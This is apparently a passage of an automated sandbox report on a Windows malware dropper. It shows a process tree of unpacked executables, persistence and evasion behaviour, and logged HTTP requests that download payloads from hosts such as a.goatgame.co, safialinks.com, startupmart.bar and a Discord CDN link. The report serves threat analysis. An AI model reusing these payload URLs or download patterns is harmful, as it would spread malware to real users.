      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2800
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4792
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3912
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3208
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3912
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3752
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5180
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5228
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5348
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5432
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5476
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5516
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5592
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5648
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5712
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5796
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5892
      - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6000
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue11141271fbe5877f.exe
      4⤵
      Loads dropped DLL
      PID:1376
    - - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue11141271fbe5877f.exe
        
        Tue11141271fbe5877f.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:1692
      - C:\ProgramData\5382906.exe
        
        "C:\ProgramData\5382906.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2616 -s 1520
        7⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:4132
      - C:\ProgramData\8022292.exe
        
        "C:\ProgramData\8022292.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2660
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3004
      - C:\ProgramData\6855562.exe
        
        "C:\ProgramData\6855562.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2784
      - C:\ProgramData\2969847.exe
        
        "C:\ProgramData\2969847.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
      - C:\ProgramData\1278526.exe
        
        "C:\ProgramData\1278526.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Loads dropped DLL
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1296
      - C:\ProgramData\2617197.exe
        
        "C:\ProgramData\2617197.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 1860
        7⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue118f55232e4.exe
      4⤵
      Loads dropped DLL
      PID:2040
    - - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue118f55232e4.exe
        
        Tue118f55232e4.exe
        5⤵
        Executes dropped EXE
        
        PID:1268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue112c483dd3245d.exe
      4⤵
      Loads dropped DLL
      PID:1700
    - - C:\Users\Admin\AppData\Local\Temp\7zS4D602CF3\Tue112c483dd3245d.exe
        
        Tue112c483dd3245d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1160
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1160 -s 984
        6⤵
        Loads dropped DLL
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2536

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2548
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:2556

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3828
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:3840

C:\Windows\system32\taskeng.exe
taskeng.exe {B05A9C92-49F7-45B5-8600-B818D2F897BA} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]
1⤵
PID:4280
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:4532
- C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
  2⤵
  PID:2832

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6928
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6964

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6116
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding F8DFC1C0A79154CED9FC1C32B9B70EBA C
  2⤵
  PID:5328
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 86C9D0A405A8F151571810A5819FFE2E
  2⤵
  PID:6536
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:6612
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 3103BB38AD76D0D547745E5EADA18EDF M Global\MSI0000
  2⤵
  PID:6464

C:\Windows\system32\taskeng.exe
taskeng.exe {976CB448-A0A8-4EE4-96C7-34B45DF7C3AD} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:4592
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
  2⤵
  PID:5408
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
  2⤵
  PID:6376
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
  2⤵
  PID:5176
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
  2⤵
  PID:1796
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
  2⤵
  PID:5936
- C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
  "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
  2⤵
  PID:6344

Network

DNS

a.goatgame.co

Tue11d7385a978cc.exe

Remote address:

8.8.8.8:53

Request

a.goatgame.co

IN A

Response

a.goatgame.co

IN A

172.67.146.70

a.goatgame.co

IN A

104.21.79.144
DNS

hsiens.xyz

setup_install.exe

Remote address:

8.8.8.8:53

Request

hsiens.xyz

IN A

Response

hsiens.xyz

IN A

104.21.87.76

hsiens.xyz

IN A

172.67.142.91
GET

https://a.goatgame.co/userf/dat/2302/sqlite.dat

Tue11d7385a978cc.exe

Remote address:

172.67.146.70:443

Request

GET /userf/dat/2302/sqlite.dat HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: a.goatgame.co

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:19 GMT
Content-Length: 578669
Connection: keep-alive
last-modified: Wed, 28 Jul 2021 11:35:53 GMT
etag: "8d46d-5c82d6397d18a"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GpGb8ficAyhLSDtXFT63kYsYbgHGEl2nbLfGFcgepJ%2FJn6rGtw3fSU0Zk%2BwCPLBoaiFCKci3LS03qo4cnP%2BUOfVFybAMvZO751Y1yksWj9potEVr9ksNopbK77vx7nDg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bda9d2e989422a-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://a.goatgame.co/userf/dat/sqlite.dll

Tue11d7385a978cc.exe

Remote address:

172.67.146.70:443

Request

GET /userf/dat/sqlite.dll HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: a.goatgame.co

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:21 GMT
Content-Type: application/x-msdownload
Content-Length: 13312
Connection: keep-alive
last-modified: Fri, 27 Aug 2021 04:30:17 GMT
etag: "3400-5ca82f0bd6e46"
accept-ranges: bytes
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EncHAT3HKPbiHAczoIfDMsqVzLpf%2BCf42y9VMhW%2BCgF%2BxOJ77HbdjIsfNVH%2BwkseXGOAtZ5cs4dhil21j9gyPuuVmoIIS5Z7wz4H4zZMkcXwUU9FAoLSVXx8U%2FsQkjOY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bda9df9dc8422a-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=149&oname[]=07Sep1157AM_UPD5Sep&oname[]=dir&oname[]=ult&oname[]=you&oname[]=GCl&oname[]=Der&oname[]=Cle&oname[]=new&oname[]=Pyi&oname[]=lih&cnt=9

setup_install.exe

Remote address:

104.21.87.76:80

Request

GET /addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=149&oname[]=07Sep1157AM_UPD5Sep&oname[]=dir&oname[]=ult&oname[]=you&oname[]=GCl&oname[]=Der&oname[]=Cle&oname[]=new&oname[]=Pyi&oname[]=lih&cnt=9 HTTP/1.1
Host: hsiens.xyz
Accept: */*

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jr4IcdbmzgK0khfarYzqUVxGgHBLdjXpqg%2FZynNEet9EH%2B0jSAcY7eh7WazysrA68xVEPobFD4emwLAkAw177%2Bt7WX9ajL%2Bptni3FWdlWOLFq9P0z1Z3c2b7jmpM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bda9cd3aa000b6-AMS
DNS

cleaner-partners.biz

setup.exe

Remote address:

8.8.8.8:53

Request

cleaner-partners.biz

IN A

Response

cleaner-partners.biz

IN A

46.8.29.181

cleaner-partners.biz

IN A

95.181.163.181
GET

http://cleaner-partners.biz/stats/1.php?pub=/mixone

Tue1109eec571ac.exe

Remote address:

46.8.29.181:80

Request

GET /stats/1.php?pub=/mixone HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:27:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
GET

http://cleaner-partners.biz/check.php?pub=mixone

Tue1109eec571ac.exe

Remote address:

46.8.29.181:80

Request

GET /check.php?pub=mixone HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: 3w-YQ-FJ-c1-l-X
Host: cleaner-partners.biz

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 09 Sep 2021 04:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.16
DNS

safialinks.com

46807GHF____.exe

Remote address:

8.8.8.8:53

Request

safialinks.com

IN A

Response

safialinks.com

IN A

162.0.213.132
DNS

remotenetwork.xyz

PublicDwlBrowser1100.exe

Remote address:

8.8.8.8:53

Request

remotenetwork.xyz

IN A

Response
DNS

gheorghip.tumblr.com

Alfanewfile2.exe

Remote address:

8.8.8.8:53

Request

gheorghip.tumblr.com

IN A

Response

gheorghip.tumblr.com

IN A

74.114.154.22

gheorghip.tumblr.com

IN A

74.114.154.18
HEAD

http://safialinks.com/Installer_Provider/UltraMediaBurner.exe

Tue11b9d76a96506.tmp

Remote address:

162.0.213.132:80

Request

HEAD /Installer_Provider/UltraMediaBurner.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: safialinks.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:26 GMT
Server: Apache
Last-Modified: Tue, 07 Sep 2021 14:56:02 GMT
ETag: "75000-5cb68f6d8e480"
Accept-Ranges: bytes
Content-Length: 479232
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET

http://safialinks.com/Installer_Provider/UltraMediaBurner.exe

Tue11b9d76a96506.tmp

Remote address:

162.0.213.132:80

Request

GET /Installer_Provider/UltraMediaBurner.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: safialinks.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:26 GMT
Server: Apache
Last-Modified: Tue, 07 Sep 2021 14:56:02 GMT
ETag: "75000-5cb68f6d8e480"
Accept-Ranges: bytes
Content-Length: 479232
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

startupmart.bar

PublicDwlBrowser1100.exe

Remote address:

8.8.8.8:53

Request

startupmart.bar

IN A

Response

startupmart.bar

IN A

104.21.37.182

startupmart.bar

IN A

172.67.211.161
GET

https://startupmart.bar/?user_auth=p3_1

Tue11141271fbe5877f.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p3_1 HTTP/1.1
Host: startupmart.bar
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DdaM%2BmIxftXRV%2FOkpa7pJO5oK%2B4u6m%2BmYiZ7h1%2BW13SRqloARc1Ub2Z3EMGLIcmPOHNvLtTiHg3KDzcm5zPgb9%2Fv%2B1sq8LM42yHU2mhiV7iNHCeuT4LWkf0QdieW69rgp2E%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa141f060bfd-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p3_2

Tue11141271fbe5877f.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p3_2 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OTn62yMqVcwNGuF0ZWoErdoXBrto5eTECXhRiL%2FspzWcVo%2FyclIYXVbxyBNjyhXSuZshNGTPUjuw5ga7vFjILtr6ln2gEIa0wPXtNimVZ%2FuFMhRkorogFrd7mA2d9mEeKoU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa196fef0bfd-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p3_3

Tue11141271fbe5877f.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p3_3 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FVu1eEJzpJ5Esv5PEU23q7vAQeOaruxgTkt28Tr5aksktaKj3kOGThagogHRv9unjfzBkzTMuqu7BpDNQvxIfIbwEdvEqQusPYrJDfTebUSMLLs4cmL68c2VF2opJoZYYE0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa1ccd430bfd-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p3_4

Tue11141271fbe5877f.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p3_4 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x1LXesEpReSTc1zV6hDR65CGU1PSJi%2BtpQZ5%2F6E72xo7Z%2BYgS7jL9Mjx0A%2FSWHTmh6I2ig8iuFEE1NGznc%2BnC77R5v6rpN%2Frq9RC6%2BszCeCtm1x7Djx6%2B5mX3hCbez7M32A%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa360e770bfd-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p3_5

Tue11141271fbe5877f.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p3_5 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9ekDuOM4DihuvqYG7YxawwcuPf4KMlR97vywhOxXWQDXaWz7SQrl9dYYcBj63ZVLv8JY5Xwt194FbXSDPIsQ6m6HHsa3GD7bNfhEV0RN%2BSRyDY%2B1oFcauw9jzDiYKaKUDK0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa46e9990bfd-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET

https://startupmart.bar/?user_auth=p3_6

Tue11141271fbe5877f.exe

Remote address:

104.21.37.182:443

Request

GET /?user_auth=p3_6 HTTP/1.1
Host: startupmart.bar

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.1.33
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fdon81J5FzL36olcQSTs3SnliOTGIo%2FWJf9XTckCUqxWKv0%2BEhnpE9vJDPc1ic006%2BU%2FzN7oHaLjbqIgn6plRMWUUafUscNdNPohT30lmbnZGHZ2WljDKSd4740Js3n3kfc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68bdaa564c5d0bfd-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
DNS

cdn.discordapp.com

Tue11f251db82fb7b.exe

Remote address:

8.8.8.8:53

Request

cdn.discordapp.com

IN A

Response

cdn.discordapp.com

IN A

162.159.133.233

cdn.discordapp.com

IN A

162.159.130.233

cdn.discordapp.com

IN A

162.159.134.233

cdn.discordapp.com

IN A

162.159.129.233

cdn.discordapp.com

IN A

162.159.135.233
GET

https://cdn.discordapp.com/attachments/873244194234318850/884688244187471922/pctool.exe

Tue11f251db82fb7b.exe

Remote address:

162.159.133.233:443

Request

GET /attachments/873244194234318850/884688244187471922/pctool.exe HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 09 Sep 2021 04:27:30 GMT
Content-Type: application/x-msdos-program
Content-Length: 3012096
Connection: keep-alive
CF-Ray: 68bdaa1cecff0c0d-AMS
Accept-Ranges: bytes
Age: 144911
Cache-Control: public, max-age=31536000
Content-Disposition: attachment;%20filename=pctool.exe
ETag: "2ab014b34ece96e3f16c6048e86498e6"
Expires: Fri, 09 Sep 2022 04:27:30 GMT
Last-Modified: Tue, 07 Sep 2021 06:35:14 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1630996514224744
x-goog-hash: crc32c=2JAT7g==
x-goog-hash: md5=KrAUs07OluPxbGBI6GSY5g==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 3012096
X-GUploader-UploadID: ADPycdvNk5nEEAKwahLmlYi2trCczG_-UCjXVN9ZGg7ybfcCwoqR0uAvrGcm7jr-uqp0UkuGHMQ6SmCJq2fn-zfrYOU
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sUqd5k5dCfyvWK%2F8KLK6hBATEIEVXZ0Uu2xduy5hkKyoQGp991DbhZwgj55dX4nr6e5HddQ%2FtAcTNwiZlH8d%2BKP0tVdgxy%2B%2F6XH1TNkz04b8Z4S91p88mP0Xy5uxSQkyk8Xrbw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
DNS

2no.co

Remote address:

8.8.8.8:53

Request

2no.co

IN A

Response

2no.co

IN A

88.99.66.31
GET

https://2no.co/1WTBy7

Tue11141271fbe5877f.exe

Remote address:

88.99.66.31:443

Request

